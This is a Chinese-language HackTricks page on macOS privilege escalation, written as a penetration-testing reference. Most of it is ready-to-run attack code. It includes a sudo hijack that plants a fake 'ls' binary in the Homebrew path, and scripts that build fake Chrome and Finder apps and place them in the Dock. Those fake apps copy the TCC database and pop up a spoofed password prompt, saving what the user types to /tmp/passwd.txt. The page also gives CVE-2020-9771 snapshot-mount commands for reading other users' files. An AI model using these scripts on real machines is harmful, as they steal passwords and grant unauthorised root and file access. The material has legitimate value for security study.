12 KiB
macOS 权限提升
☁️ HackTricks 云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- 你在网络安全公司工作吗?你想在HackTricks看到你的公司广告吗?或者你想要访问最新版本的 PEASS 或下载 HackTricks 的 PDF?查看订阅计划!
- 发现PEASS 家族,我们独家的NFTs 集合
- 获取官方 PEASS & HackTricks 商品
- 加入💬 Discord 群组 或 telegram 群组 或在推特上关注我 🐦@carlospolopm。
- 通过提交 PR 到hacktricks 仓库 和 hacktricks-cloud 仓库 分享你的黑客技巧。
TCC 权限提升
如果你是为了寻找 TCC 权限提升而来,请前往:
{% content-ref url="macos-security-protections/macos-tcc/" %} macos-tcc {% endcontent-ref %}
Linux 权限提升
请注意,大多数影响 Linux/Unix 的权限提升技巧也会影响 MacOS 机器。所以请查看:
{% content-ref url="../../linux-hardening/privilege-escalation/" %} privilege-escalation {% endcontent-ref %}
用户交互
Sudo 劫持
你可以在 Linux 权限提升文章中找到原始的 Sudo 劫持技术。
然而,macOS 在执行**sudo
时保持用户的PATH
。这意味着实现这种攻击的另一种方法是劫持其他受害者在运行 sudo 时会执行的二进制文件:**
# Let's hijack ls in /opt/homebrew/bin, as this is usually already in the users PATH
cat > /opt/homebrew/bin/ls <<EOF
#!/bin/bash
if [ "\$(id -u)" -eq 0 ]; then
whoami > /tmp/privesc
fi
/bin/ls "\$@"
EOF
chmod +x /opt/homebrew/bin/ls
# victim
sudo ls
请注意,使用终端的用户很可能已经安装了Homebrew。因此,可以劫持位于**/opt/homebrew/bin
**中的二进制文件。
Dock 伪装
利用一些社会工程学技巧,你可以在dock中伪装成例如Google Chrome,实际上执行你自己的脚本:
{% tabs %} {% tab title="Chrome 伪装" %} 一些建议:
- 检查Dock中是否有Chrome,如果有,移除该项,并在Dock数组中添加一个假的 Chrome项,放在相同的位置。
#!/bin/sh
# THIS REQUIRES GOOGLE CHROME TO BE INSTALLED (TO COPY THE ICON)
# If you want to removed granted TCC permissions: > delete from access where client LIKE '%Chrome%';
rm -rf /tmp/Google\ Chrome.app/ 2>/dev/null
# Create App structure
mkdir -p /tmp/Google\ Chrome.app/Contents/MacOS
mkdir -p /tmp/Google\ Chrome.app/Contents/Resources
# Payload to execute
cat > /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c <<EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main() {
char *cmd = "open /Applications/Google\\\\ Chrome.app & "
"sleep 2; "
"osascript -e 'tell application \"Finder\"' -e 'set homeFolder to path to home folder as string' -e 'set sourceFile to POSIX file \"/Library/Application Support/com.apple.TCC/TCC.db\" as alias' -e 'set targetFolder to POSIX file \"/tmp\" as alias' -e 'duplicate file sourceFile to targetFolder with replacing' -e 'end tell'; "
"PASSWORD=\$(osascript -e 'Tell application \"Finder\"' -e 'Activate' -e 'set userPassword to text returned of (display dialog \"Enter your password to update Google Chrome:\" default answer \"\" with hidden answer buttons {\"OK\"} default button 1 with icon file \"Applications:Google Chrome.app:Contents:Resources:app.icns\")' -e 'end tell' -e 'return userPassword'); "
"echo \$PASSWORD > /tmp/passwd.txt";
system(cmd);
return 0;
}
EOF
gcc /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c -o /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome
rm -rf /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c
chmod +x /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome
# Info.plist
cat << EOF > /tmp/Google\ Chrome.app/Contents/Info.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CFBundleExecutable</key>
<string>Google Chrome</string>
<key>CFBundleIdentifier</key>
<string>com.google.Chrome</string>
<key>CFBundleName</key>
<string>Google Chrome</string>
<key>CFBundleVersion</key>
<string>1.0</string>
<key>CFBundleShortVersionString</key>
<string>1.0</string>
<key>CFBundleInfoDictionaryVersion</key>
<string>6.0</string>
<key>CFBundlePackageType</key>
<string>APPL</string>
<key>CFBundleIconFile</key>
<string>app</string>
</dict>
</plist>
EOF
# Copy icon from Google Chrome
cp /Applications/Google\ Chrome.app/Contents/Resources/app.icns /tmp/Google\ Chrome.app/Contents/Resources/app.icns
# Add to Dock
defaults write com.apple.dock persistent-apps -array-add '<dict><key>tile-data</key><dict><key>file-data</key><dict><key>_CFURLString</key><string>/tmp/Google Chrome.app</string><key>_CFURLStringType</key><integer>0</integer></dict></dict></dict>'
sleep 0.1
killall Dock
{% endtab %}
{% tab title="Finder 伪装" %} 一些建议:
- 你不能从 Dock 中移除 Finder,所以如果你要把它添加到 Dock,你可以把假的 Finder 放在真正的 Finder 旁边。为此,你需要在 Dock 数组的开头添加假 Finder 条目。
- 另一个选项是不把它放在 Dock 上,只是打开它,“Finder 请求控制 Finder”并不奇怪。
- 另一个不通过可怕的对话框升级到 root 而不询问密码的选项是,让 Finder 真的请求密码来执行特权操作:
- 要求 Finder 复制一个新的
sudo
文件到/etc/pam.d
(提示要求输入密码将表明“Finder 想要复制 sudo”) - 要求 Finder 复制一个新的 授权插件(你可以控制文件名,所以提示要求输入密码将表明“Finder 想要复制 Finder.bundle”)
#!/bin/sh
# THIS REQUIRES Finder TO BE INSTALLED (TO COPY THE ICON)
# If you want to removed granted TCC permissions: > delete from access where client LIKE '%finder%';
rm -rf /tmp/Finder.app/ 2>/dev/null
# Create App structure
mkdir -p /tmp/Finder.app/Contents/MacOS
mkdir -p /tmp/Finder.app/Contents/Resources
# Payload to execute
cat > /tmp/Finder.app/Contents/MacOS/Finder.c <<EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main() {
char *cmd = "open /System/Library/CoreServices/Finder.app & "
"sleep 2; "
"osascript -e 'tell application \"Finder\"' -e 'set homeFolder to path to home folder as string' -e 'set sourceFile to POSIX file \"/Library/Application Support/com.apple.TCC/TCC.db\" as alias' -e 'set targetFolder to POSIX file \"/tmp\" as alias' -e 'duplicate file sourceFile to targetFolder with replacing' -e 'end tell'; "
"PASSWORD=\$(osascript -e 'Tell application \"Finder\"' -e 'Activate' -e 'set userPassword to text returned of (display dialog \"Finder needs to update some components. Enter your password:\" default answer \"\" with hidden answer buttons {\"OK\"} default button 1 with icon file \"System:Library:CoreServices:Finder.app:Contents:Resources:Finder.icns\")' -e 'end tell' -e 'return userPassword'); "
"echo \$PASSWORD > /tmp/passwd.txt";
system(cmd);
return 0;
}
EOF
gcc /tmp/Finder.app/Contents/MacOS/Finder.c -o /tmp/Finder.app/Contents/MacOS/Finder
rm -rf /tmp/Finder.app/Contents/MacOS/Finder.c
chmod +x /tmp/Finder.app/Contents/MacOS/Finder
# Info.plist
cat << EOF > /tmp/Finder.app/Contents/Info.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CFBundleExecutable</key>
<string>Finder</string>
<key>CFBundleIdentifier</key>
<string>com.apple.finder</string>
<key>CFBundleName</key>
<string>Finder</string>
<key>CFBundleVersion</key>
<string>1.0</string>
<key>CFBundleShortVersionString</key>
<string>1.0</string>
<key>CFBundleInfoDictionaryVersion</key>
<string>6.0</string>
<key>CFBundlePackageType</key>
<string>APPL</string>
<key>CFBundleIconFile</key>
<string>app</string>
</dict>
</plist>
EOF
# Copy icon from Finder
cp /System/Library/CoreServices/Finder.app/Contents/Resources/Finder.icns /tmp/Finder.app/Contents/Resources/app.icns
# Add to Dock
defaults write com.apple.dock persistent-apps -array-add '<dict><key>tile-data</key><dict><key>file-data</key><dict><key>_CFURLString</key><string>/tmp/Finder.app</string><key>_CFURLStringType</key><integer>0</integer></dict></dict></dict>'
sleep 0.1
killall Dock
{% endtab %} {% endtabs %}
TCC - Root 权限提升
CVE-2020-9771 - mount_apfs TCC 绕过和权限提升
任何用户(即使是非特权用户)都可以创建并挂载时间机器快照并访问该快照的所有文件。
所需的唯一权限是应用程序(如 Terminal
)需要有完全磁盘访问(FDA)权限(kTCCServiceSystemPolicyAllfiles
),这需要由管理员授权。
{% code overflow="wrap" %}
# Create snapshot
tmutil localsnapshot
# List snapshots
tmutil listlocalsnapshots /
Snapshots for disk /:
com.apple.TimeMachine.2023-05-29-001751.local
# Generate folder to mount it
cd /tmp # I didn it from this folder
mkdir /tmp/snap
# Mount it, "noowners" will mount the folder so the current user can access everything
/sbin/mount_apfs -o noowners -s com.apple.TimeMachine.2023-05-29-001751.local /System/Volumes/Data /tmp/snap
# Access it
ls /tmp/snap/Users/admin_user # This will work
{% endcode %}
更详细的解释可以在原始报告中找到。
敏感信息
这可以用来提升权限:
{% content-ref url="macos-files-folders-and-binaries/macos-sensitive-locations.md" %} macos-sensitive-locations.md {% endcontent-ref %}
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- 如果你在一家网络安全公司工作?你想在HackTricks中看到你的公司广告?或者你想要访问PEASS的最新版本或下载HackTricks的PDF?查看订阅计划!
- 发现PEASS家族,我们独家的NFTs收藏。
- 获取官方的PEASS & HackTricks商品
- 加入💬 Discord群组或telegram群组或在Twitter上关注我🐦@carlospolopm。
- 通过向hacktricks仓库 和 hacktricks-cloud仓库 提交PR来分享你的黑客技巧。